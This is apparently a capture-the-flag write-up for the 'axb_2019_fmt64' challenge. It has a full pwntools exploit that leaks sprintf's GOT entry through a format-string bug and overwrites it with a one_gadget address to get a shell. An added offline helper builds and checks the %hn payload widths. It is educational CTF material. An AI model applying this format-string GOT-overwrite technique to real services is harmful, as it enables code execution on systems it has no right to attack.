axb_2019_fmt64

    exp

    The binary has a format string vulnerability. It is used twice: first to leak a GOT entry (sprintf's) and compute the libc base, then to overwrite sprintf's GOT entry with a one_gadget address, so the next time the program calls sprintf we get a shell. Two details matter for the arbitrary write: printf has already output 9 fixed characters before it reaches our format string, so those 9 are already in the character count when the first %hn fires and must be subtracted from the first width; and the width of the second write is the distance between the two 16-bit halves of the target value, which has to be taken modulo 0x10000, otherwise it goes negative whenever the upper halfword is smaller than the lower one and the payload silently breaks.

    from pwn import *
    
    # context.log_level = 'debug'
    
    # io = process('./axb_2019_fmt64')
    io = remote('node3.buuoj.cn', 29548)
    elf = ELF('./axb_2019_fmt64')
    # libc = elf.libc
    libc = ELF('./libc/libc-2.23.so')
    
    # one_gadget offsets for this libc-2.23 build
    one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
    sprintf_got = elf.got['sprintf']
    
    # Step 1: leak. Our input starts at printf argument 8, so the pointer
    # placed after the 8-byte '%9$saaaa' is argument 9 and %9$s prints the
    # contents of sprintf@got, i.e. sprintf's address inside libc.
    payload = b'%9$saaaa'
    payload += p64(sprintf_got)
    
    io.recvuntil(b'Please tell me:')
    io.sendline(payload)
    
    # A userland libc address is 6 bytes and ends in 0x7f; pad it to 8 for u64.
    sprintf_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
    print('sprintf_addr: ' + hex(sprintf_addr))
    
    libcbase = sprintf_addr - libc.symbols['sprintf']
    one_gadget = libcbase + one_gadget[0]
    print('one_gadget: ' + hex(one_gadget))
    
    # Step 2: overwrite the low 4 bytes of sprintf@got with two %hn writes.
    # 9 fixed characters are printed before our format string, so they are
    # subtracted from the first width; the second width is the distance
    # between the two halfwords, taken mod 0x10000 so it cannot go negative.
    # A width of 0 would still print one character, so wrap a full 0x10000.
    lo = one_gadget & 0xffff
    hi = (one_gadget >> 16) & 0xffff
    w1 = (lo - 9) % 0x10000 or 0x10000
    w2 = (hi - lo) % 0x10000 or 0x10000
    payload = '%{}c%12$hn%{}c%13$hn'.format(w1, w2).encode()
    payload = payload.ljust(0x20, b'\x00')              # arguments 8..11
    payload += p64(sprintf_got) + p64(sprintf_got + 2)  # arguments 12 and 13
    
    print('payload: ' + repr(payload))
    io.sendline(payload)
    
    io.interactive()
    
    
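The width arithmetic in the second payload (subtract the 9 characters already printed, then move from the low halfword to the high one) is the part of this exploit that is easiest to get wrong. The following is an added example, not part of the original writeup, that builds the two-%hn payload in general form and checks it against a small emulation of printf's character counting, so it runs offline without the binary. It follows the layout of the exploit above (input buffer at printf argument 8, 9-character fixed prefix, 0x20 bytes of format text followed by the two target pointers); the gadget address and GOT slot in it are made-up sample values, and it covers the cases the writeup's one-liner does not, namely an upper halfword smaller than the lower one and a width that would come out as zero.

```python
import re
import struct

PREFIX_LEN = 9   # characters printf emits before our format string (from the writeup)
INPUT_ARG = 8    # printf argument index at which our input buffer begins (from the exploit)


def build_hn_payload(value, target, prefix_len=PREFIX_LEN, input_arg=INPUT_ARG,
                     fmt_qwords=4):
    """Payload that writes the low 32 bits of `value` to `target` via two %hn writes.

    The format text occupies `fmt_qwords` 8-byte argument slots starting at
    `input_arg`; the two target pointers follow it, so they are arguments
    input_arg+fmt_qwords and input_arg+fmt_qwords+1.
    """
    lo = value & 0xffff
    hi = (value >> 16) & 0xffff
    arg_lo = input_arg + fmt_qwords
    arg_hi = arg_lo + 1
    # First width: reach `lo`, counting from the characters already printed.
    # A width of 0 would still print one character, so wrap a full 0x10000 instead.
    w1 = (lo - prefix_len) % 0x10000 or 0x10000
    printed = prefix_len + w1                 # == lo (mod 0x10000)
    # Second width: from the current count up to `hi`, again mod 0x10000 so it
    # is never negative when hi < lo.
    w2 = (hi - printed) % 0x10000 or 0x10000
    fmt = '%{}c%{}$hn%{}c%{}$hn'.format(w1, arg_lo, w2, arg_hi).encode()
    if len(fmt) > fmt_qwords * 8:
        raise ValueError('format text does not fit in its argument slots')
    fmt = fmt.ljust(fmt_qwords * 8, b'\x00')
    return fmt + struct.pack('<Q', target) + struct.pack('<Q', target + 2)


def simulate_printf(fmt, args, memory, prefix_len=PREFIX_LEN):
    """Emulate the subset of printf the payload relies on: literals, %<N>c and %<k>$hn.

    `args` maps argument index -> 8-byte stack value; `memory` is a dict of
    address -> byte that %hn writes into. Returns the final character count.
    The format is cut at the first NUL, as the program's sprintf("%s") copy does.
    """
    text = fmt.split(b'\x00')[0].decode()
    count = prefix_len
    pos = 0
    for m in re.finditer(r'%(\d+)c|%(\d+)\$hn', text):
        count += m.start() - pos          # literal characters before this conversion
        pos = m.end()
        if m.group(1) is not None:        # %Nc: N characters of padding
            count += int(m.group(1))
        else:                             # %k$hn: store the count as a 16-bit value
            addr = args[int(m.group(2))]
            memory[addr] = count & 0xff
            memory[addr + 1] = (count >> 8) & 0xff
    return count + len(text) - pos


def check_write(value, target, prefix_len=PREFIX_LEN):
    """Build the payload, run it through the emulator and return the 32-bit value written."""
    payload = build_hn_payload(value, target, prefix_len)
    # Lay the payload out as printf sees it: consecutive 8-byte arguments from INPUT_ARG.
    args = {INPUT_ARG + i: struct.unpack_from('<Q', payload, 8 * i)[0]
            for i in range(len(payload) // 8)}
    memory = {}
    simulate_printf(payload, args, memory, prefix_len)
    return sum(memory.get(target + i, 0) << (8 * i) for i in range(4))


if __name__ == '__main__':
    # Made-up gadget address and GOT slot, only to exercise the arithmetic.
    gadget, got = 0x7f8a3c245216, 0x601048
    print(build_hn_payload(gadget, got))
    print(hex(check_write(gadget, got)))   # 0x3c245216
```

`build_hn_payload` reproduces the exploit's payload exactly for the ordinary case, and `check_write` is the thing to run before sending anything: if it does not return the low 32 bits of your gadget address, the widths are wrong. The emulator only models the conversions the payload uses, so any other specifier in a format text will not be counted.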
Original article: https://www.cnblogs.com/luoleqi/p/13413891.html